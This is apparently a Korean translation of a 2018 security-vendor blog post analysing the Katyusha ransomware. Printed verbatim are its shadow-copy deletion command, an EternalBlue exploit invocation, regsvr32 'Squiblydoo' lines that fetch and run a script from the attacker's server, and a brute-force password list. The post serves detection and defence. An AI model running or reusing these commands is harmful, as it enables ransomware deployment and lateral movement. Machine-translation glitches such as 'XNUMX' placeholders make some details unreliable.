• 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite 블로그
영업팀에 문의
  • 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
홈  /  랜섬  / 정교한 랜섬웨어 : “카츄샤”
정교한 랜섬웨어: “카츄샤”
14 12월 2018

정교한 랜섬웨어: “카츄샤”

Written by 간샤얌 모어
간샤얌 모어
랜섬
17
공유

Quick Heal Security Labs는 몇 달 동안 랜섬웨어가 증가하는 것을 관찰해 왔습니다. 파일을 암호화하고 ".katyusha" 확장자를 추가한 후 0.5일 이내에 XNUMXBTC를 요구하고, 몸값을 지불하지 않으면 데이터를 공개하겠다고 위협하는 또 다른 흥미로운 랜섬웨어를 발견했습니다. 이 랜섬웨어는 "더블 펄서"및"영원한 푸른색네트워크 전체에 확산되는 데 사용되는 익스플로잇입니다. 또한 "스퀴블리두네트워크 전체로 확산될 수 있습니다. 이 랜섬웨어의 감염 경로는 아직 확인되지 않았지만, 출처를 기반으로 볼 때 이 랜섬웨어는 스피어 피싱, 멀버타이징, 스팸 메일, SMB 익스플로잇 등을 통해 시스템에 침투할 가능성이 있습니다.

기술 분석:

이 맬웨어는 MPRESS(v2.19)에 포함되어 있으며 피해자 시스템에 "라는 이름으로 존재합니다.카츄샤.exe"%temp%"에 있습니다. 여기에는 세 가지 구성 요소가 포함되어 있습니다. 실행 시 이 구성 요소를 C:\Windows\Temp에 저장하고 실행을 시작합니다.

  • Svchost0.bat
  • Zkts.exe
  • Ktsi.exe

카츄샤는 시스템이 이미 감염되었는지 확인하기 위해 시스템에서 다음 파일을 검사합니다.

“C:\_how_to_decrypt_you_files.txt”

“C:\ProgramData\_how_to_decrypt_you_files.txt”

시스템이 이미 감염된 경우, Katyusha는 그림 0과 같이 자체 복제본을 삭제하고 자신을 종료하는 코드가 포함된 배치 파일(svchost1.bat)을 생성합니다. 시스템이 감염되지 않은 경우, zkts.exe와 ktsi.exe를 삭제하고 실행합니다.

그림 1: Svchost0.bat의 내용

 

Zkts.exe:

이 파일은 7zip으로 압축된 실행 파일이며 네트워크 확산 모듈, 비밀번호 도용 모듈 등 여러 하위 모듈을 포함하는 주요 구성 요소입니다.

zkts.exe를 실행하면 "C : \ Windows \ Temp”Mimikatz, katyusha.dll, eternal blue exploit 등이 있습니다. 이러한 DLL 파일은 나중에 Katyusha에서 활동을 수행하는 데 사용됩니다.

그림 2. zkts.exe에 의해 삭제된 파일

 

Ktsi.exe (암호화기):

이 파일 역시 MPRESS로 압축된 파일인 주요 구성 요소입니다. 주로 파일 암호화 및 피해자 시스템에 랜섬웨어 메시지를 유포하는 데 사용됩니다. 이 프로세스는 그림 3과 같이 메인 페이로드(katyusha.exe)에 의해 독립적으로 시작됩니다.

그림 3: ktsi.exe에 대한 CreateProcess() 호출

 

ktsi.exe를 실행하면 먼저 그림 4에 표시된 대로 암호화를 위해 관련 프로세스에 의해 잠긴 파일(예: db 파일 등)의 핸들을 해제하기 위해 다음 작업 목록을 종료합니다.

데이터베이스 관련 파일을 성공적으로 암호화하기 위해 ktsi는 데이터베이스 애플리케이션과 관련된 프로세스를 종료합니다. 아래는 맬웨어에 하드코딩된 프로세스 목록입니다.

mysqld.exe  httpd.exe  sqlsevr.exe
sqlwriter.exe  w3wp.exe  sqlagent.exe
fdhost.exe  fdlauncher.exe  보고서비스서비스.exe
omtsreco.exe   tnslsnr.exe   오라클.exe
emagent.exe  mysqld-nt.exe
그림 4: Taskkill 명령 실행.

taskkill 작업 후 맬웨어는 아래 경로에 html 및 txt 형식의 랜섬 노트를 삭제하여 시스템 시작 시 모든 사용자가 볼 수 있도록 합니다.

“C:\ProgramData\Microsoft\Windows\시작 메뉴\프로그램\시작프로그램”

_파일_복호화_방법.txt

_파일_복호화_방법.html

"C:\ProgramData"와 C 드라이브 루트(C:\)에 "_how_to_decrypt_you_files.txt"라는 이름의 랜섬웨어 메모만 저장합니다.

 

그림 5: 몸값 요구서

Ktsi.exe는 다음 명령을 실행하여 섀도 복사본도 삭제합니다.

"vssadmin delete shadows /all /quiet"

그림 6: 섀도 복사본 삭제

 

이러한 모든 작업이 끝나면 ktsi.exe는 표준 암호화 방법을 사용하여 파일 암호화(RSA)를 시작합니다. 크립토감스이 알고리즘과 관련된 서명은 그림 7에 표시된 것처럼 파일에서 찾을 수 있습니다.

그림 7: Cryptogams 문자열.

 

다음 파일을 제외한 모든 확장자 파일을 암호화합니다.

그림 8: 암호화에서 제외된 확장자.

또한, 그림 9와 같이 파일 및 폴더 제외 목록이 포함되어 있으며, 열거된 파일 경로에서 해당 단어가 발견되면 해당 경로를 암호화 대상에서 제외합니다. 중단 없는 암호화를 위해 목록에는 몇 가지 보안 제품의 이름이 포함되어 있습니다.

그림 9: 파일 및 폴더 제외 목록.

 

확산 메커니즘:

네트워크 확산을 위해 zkts에서 추출된 파일이 사용됩니다. 추출된 구성 요소는 그림 2를 참조하십시오.

m32.exe와 m64.exe는 Windows lsass.exe에서 자격 증명을 가져오는 데 사용되는 Mimikatz 도구입니다.

첫째, katyusha.exe는 IsWow64Process 시스템 호출을 사용하여 시스템이 32비트인지 64비트인지 판별합니다(시스템이 64비트이면 XNUMX이 아닌 값을 반환함). 그리고 시스템 아키텍처에 따라 Mimikatz를 실행합니다.

Mimikatz 도구는 다음 파일을 삭제합니다. “C:\Windows\Temp” 출력으로.

– snamelog : 가져온 사용자 이름이 들어 있습니다.

– spasslog : 가져온 각 사용자 이름에 대한 비밀번호가 포함되어 있습니다.

그림 10: 시스템 유형을 확인하고 Mimikatz를 시작합니다.

mimikatz를 실행한 후, katyusha.exe는 snamelog에서 사용자 이름을, spasslog에서 비밀번호를 읽어 네트워크에 대한 무차별 대입 공격을 수행합니다.

Zkts.exe는 또한 svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll 및 svchostp.exe를 삭제합니다. 이러한 구성 요소는 네트워크를 통해 Katyusha를 확산하는 데 사용됩니다.

이터널 블루 익스플로잇과 더블 펄서를 이용하여, 악성코드는 네트워크로 연결된 시스템에서 katyusha.dll을 순차적으로 실행합니다. 이 katyusha.exe는 다음 명령을 사용하여 SMB 취약점을 악용합니다.

“C:\windows\temp\&svchostb.exe –TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp ”

그림 11: 네트워크의 각 시스템에서의 악용 실행.

Katyusha.dll은 다음 명령을 실행하는 코드를 포함하는 페이로드 파일입니다.

"regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll"

그림 12에서 볼 수 있듯이 파일에서 하드코딩된 명령 문자열을 찾을 수도 있습니다.

그림 12: Url에서 스크립트를 다운로드하고 실행하는 명령

위의 regsvr32(Microsoft Register Server) 명령을 실행하면 주어진 URL에서 스크립트(katyusha.data)를 다운로드하고 regsvr32 매개변수(/u)를 사용하여 등록 해제 서버를 호출합니다. 이렇게 하면 다음 위치에서 자바스크립트 코드가 실행됩니다. 그림 13에 표시된 것처럼 다운로드한 스크립틀릿의 태그입니다. 스크립트에는 주어진 URL에서 katyusha.exe를 다운로드하는 코드가 포함되어 있습니다. "% 온도 %" 디렉토리로 이동하여 실행합니다.

그림 13: katyusha.data 스크립트의 내용
그림 14: 감염된 시스템의 스크립트 및 페이로드에 대한 다운로드 요청.

C&C에서 스크립틀릿을 다운로드하고 실행하기 위해 regsvr32 명령을 사용하는 이러한 공격을 다음과 같이 지칭합니다. “스퀴블리두”.

위의 작업 후, Power Admin Tool(svchostp.exe)을 사용하여 네트워크의 시스템에 무차별 대입 공격을 가합니다. 이 도구는 Sysinternals와 유사합니다. PsExec의 원격 시스템에서 프로세스를 실행하는 데 사용되는 도구입니다. 이 랜섬웨어는 아래와 같이 몇 가지 사용자 이름과 비밀번호 목록을 가지고 있으며, Mimikatz가 가져온 사용자 이름과 비밀번호(snamelog 및 spasslog)를 무차별 대입 공격에 사용합니다.

사용자 이름:

관리자, 관리자, +snamelog의 콘텐츠.

암호:

관리자, 12345, chinachina203, 111, 123456, qwerty, 테스트, abc123, 12345678, 0000, 1122, 1234, +spasslog의 내용.

무차별 대입에서 Katyusha는 다음 명령을 사용합니다.

“C:\Windows\temp\svchostp.exe -유 -피 -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”

위의 명령은 매개변수로 url을 사용하여 regsvr32 유틸리티를 실행하여 페이로드를 다운로드하고 katyusha.dll에 대해 위에서 설명한 작업을 수행합니다.

그림 15. Power Admin 도구(svchostp.exe) 사용

IOC:

   MD5 : 7f87db33980c0099739de40d1b725500

   URL:

  1.  hxxp://86.106.102.147/img/katyusha.data
  2. hxxp://86.106.102.147/img/katyusha.exe

   비트코인 지갑 주소: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”

맺음말:

올해 랜섬웨어가 급증했습니다. 랜섬웨어는 새로운 유포 수법을 사용하고 데이터를 암호화하고 있습니다. 현재 대부분의 랜섬웨어는 네트워크를 통해 유포되기 위해 Eternal Blue, Mimikatz와 같은 익스플로잇과 도구를 사용합니다. 사용자 여러분께서는 의심스러운 URL/이메일에 접근하지 마시고, 강력한 시스템 자격 증명을 사용하고, 백신 프로그램을 최신 상태로 유지하시기 바랍니다.

주제 전문가:

프라틱 파치포르 | 퀵힐 보안 랩스

 이전 포스트CVE-2018-15982- Adobe Flash Player 사용 후 무료화(제로데이) 취약점...
다음 포스트  유령이 도착했습니다
간샤얌 모어

Ghanshyam에 대한 추가 정보

간샤얌은 Quick Heal Security Labs의 보안 연구원입니다. 그는 리버스 엔지니어링과 보안 취약점 분석에 관심이 있습니다.

Ghanshyam의 기사 더보기 »

관련 게시물

  • 공개적으로 공유되는 SMB2 연결을 통한 랜섬웨어 공격 및 Seqrite를 통한 보호 유지

    2025 년 3 월 11 일
  • 공격자가 BitLocker를 악용하는 방법: 합법적인 도구를 랜섬웨어 무기로 전환

    2025 년 3 월 11 일
  • 노출된 SMB: 'WantToCry' 랜섬웨어 공격 뒤에 숨겨진 위험

    2025 년 1 월 31 일
추천 작가
  • 시크라이트
    시크라이트

    Seqrite는 선도적인 기업용 사이버 보안 솔루션 제공업체입니다.

    더 읽기 ..
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    더 읽기 ..
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    더 읽기 ..
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    더 읽기 ..
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (335) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (50) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) 데이터 프라이버시 (15) 데이터 보호 (32) 데이터 보안 (17) DLP (50) DPDP (14) 디피디파 (16) 암호화 (16) 엔드 포인트 보안 (110) 엔터프라이즈 보안 (18) 공적 (13) GDPR (13) 악성 코드 (76) 악성 코드 분석 (13) 악성 코드 공격 (23) 맬웨어 공격 (12) MDM (27) Microsoft (15) 네트워크 보안 (24) 패치 관리 (12) 피싱 (29) 랜섬 (69) 중매 공격 (30) ransomware 공격 (30) 중매 보호 (14) 시크라이트 (40) Seqrite 암호화 (27) 시크라이트 EPS (33) Seqrite 서비스 (16) 그래프 기반 사이버 위협 인텔리전스 (13) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 보기

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 모바일 장치 관리
  • BYOD
  • 확장 된 탐지 및 대응
  • 제로 트러스트 네트워크 액세스
  • 데이터 개인 정보
  • 온프레미스
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 데이터 개인 정보
  • 플랫폼
  • 악성코드 분석 플랫폼
  • 마이크로 비즈니스
  • SOHO 토탈 에디션
  • 서비스
  • 위협 인텔
  • 디지털 위험 보호 서비스(DRPS)
  • 랜섬웨어 복구 서비스(RRaaS)
  • DPDP 준수
  • 관리되는 탐지 및 대응
자료
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 데이터 개인 정보 보호 이해
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
문의하기
  • 등록 사무소
  • 가장 가까운 사무실
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
Renew MD 소개
  • Seqrite 소개
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관